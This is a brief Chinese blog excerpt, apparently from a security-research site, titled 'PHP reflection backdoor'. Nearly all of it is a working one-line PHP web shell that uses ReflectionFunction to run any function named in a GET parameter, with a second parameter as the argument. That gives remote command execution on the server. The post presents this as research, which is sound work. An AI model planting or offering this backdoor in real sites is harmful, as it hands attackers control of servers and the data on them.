PHP反射后门 Nov 07,2014 in 安全研究,Web read (2746) <?php $func = new ReflectionFunction($_GET[m]); echo $func->invokeArgs(array($_GET[c]));?> 继续阅读